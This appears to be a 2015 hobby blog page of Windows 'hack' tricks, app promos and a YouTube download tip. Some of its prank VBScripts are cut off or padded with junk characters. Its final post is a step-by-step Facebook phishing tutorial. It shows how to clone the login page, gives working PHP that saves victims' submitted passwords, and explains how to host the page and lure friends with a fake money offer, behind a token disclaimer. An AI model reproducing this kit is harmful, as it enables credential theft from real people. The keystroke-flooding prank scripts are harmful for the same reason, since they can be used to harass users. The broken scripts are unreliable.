Search This Blog

Wednesday, September 30, 2015

HACK THE KEYBOARD


THIS WILL HACK UR KEYBOARD AND TILL SHUTDOWN U WILL NT ABLE TO TYPE ANYTHING !!!

JST COPY THE BELOW GIVEN CODE TO NOTEPAD :


MsgBox "YOUR KEYBOARD HAS BEEN HACKED. YOU ARE A FOOL"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
sadddddddddddddddddddddddsssssssssssssssssssssssssssssssssssssssssvgb ghvb

SAVE IT AS  KEYHACK.vbs

LET'S GO BACK FEW STEPS

THIS CODE WILL JST TAKE U AS BACK AS IT CAN IN UR COMPUTER

JST COPY BELOW GIVEN CODE TO NOTEPAD :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do

HACK UR CD ROM

THIS TRICK WILL CERTAINLY MAKE UR CD ROM TO OPEN AND CLOSE TILL UR COMPUTER IS NT SHUTDOWN

JST COPY THE BELOW GIVEN CODE TO NOTEPAD :



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject

Lock Folders using Notepad


Lock Folders using Notepad

This trick may not work on all computers
Lets say you want to lock a folder named PICS in your D:\ drive , whose path is D:\PICS
Then the code should be something like this:
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.
To unlock this locked folder:
Open another new notepad text file and type the following:
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics

Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder you want to lock.

Tuesday, September 29, 2015

Vodafone 3g Hack | Vodafone 3g Free Internet

Vodafone 3g Hack  | Vodafone 3g Free Internet 


Hello Everyone, This is the first Network Trick going to br posted in The Software Blog.I'm going to provide you with 3 Tricks for Free Internet in Vodafone ..!!

JIO CHAT AN GOOD COTENDOR FOR WHATSAPP AND HIKE

Reliance had Jio chat application ,on 11th april 2015.With amazing features  which  supports  for  both  android  and ios . now  jio  chat  is competing  with  Whats app , hike , line , skype , we  chat ,  etc.., With jio chat you not  only  chat  with  others  we  can  also  have video   and audio conferences with them
jiochat and whatsapp features comparison:

Features of jio chat:

Rich messaging experience:You can chat easily upto 100 at a time. you can add stickers,doodles,emoticons etc..,You can download additional stickers in sticker store.
video conference: jio chat also  have  a   video   chat  feature  like skype,but additional to it in jio we can have a video conference in groups
voice calling : in this app you can have group voice call.At time more than two can speak
 Hide or Share:It’s up to you! Jio Chat offers location sharing, status sharing. But if you are in the mood for some privacy, simply turn the feature off

Follow your favourite,celebrities,channel:Users of Jio Chat will also get the latest news, content and offers from favourite brands on Jio Chat Channels.
 

Download jio chat:

 Now jio chat is available for both android and ios ,reliance is building for windows soon.

GET IT ON GOOGLE PLAY



GET IT ON APPLE STORE

How To Download Videos From Youtube?

How To Download Videos From Youtube?




Every person who watches you tube videos,wants to download the videos but they don't how to download.so today I posted these trick to download youtube videos without any software
how to download you tube videos?
1.open the video in you tube that you to download



2.then just type ss after www. in the link and hit enter.
3.Then a new window opens,savefrom.net
4.select the video clarity,there are nearly seven types of clarity options.

5.After clicking that a dialogue box appears ,select save file and then click on ok

6.then your video starts downloadin

How To Hack Facebook Account Password Phishing Method

How To Hack Facebook Account Password Phishing Method


I think all will be curious to know how to hack friends fb account password.today i am going to say how to hack fb password easily,you don't want to learn any coding juct follow the below steps to hack :
There are four ways to hack facebook account;

1.Facebook phising
2.remote update facebook status [social engineering]
3.Man in middle attack
4.Key logging
Now Iam going to explain about phising method which is very simple,easy and famous methods of facebook hacking
what is phising?
phising is nothing but creating a fake page of fabook and upload to internet through free webhosting services.If any one  login through your fake facebook page which looks like original,all the passwords of the victims are saved in your web directory.
Follow these steps:
STEP1:open facebook login page ,if you are already logged in logout first,then right click on that page and select view source code

Now a new window opens with some code
STEP2:Now open notepad and copy all the code into that and search for the below code by pressing ctrl +f and type action

you will get 9 results then find the below code in that 9 results by pressing next 
action="https://www.facebook.com/login.php?login_attempt=1"
change it to 
action="post.php"  
and also change the method=post line before action to method=get 
STEP3:save the above file as index.htm not index.html
step4:Now copy the below code and paste it note pad and save it as post.php
 <?php
header ('Location:http://www.facebook.com/');
$handle = fopen("passwords.html", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 
step5:now create a empty notepad file and save it as passwords .html
Now upload the three files to a free webhosting site like 000webhost 
steps to upload the 3 files to 000 webhost:
1.sign up to 000 webhost,select a subdomain which ever you want.

2.confirm your account clicking on confirmation link send to your email account
3.now go to control pannel and click on filemanager

4.after that a new window will open ,open public.html and delete default.php

5.then upload the three files by clicking on upload on the top

Now send your phising page link to your friends by posting a message earn money by loggong into facebook through this link
then every body will login to fb through your page 
If anyone log in through this page open passwords.html in public html to see the logged in account email and password

NOTE:this only for educational purpose don,t misuse it okay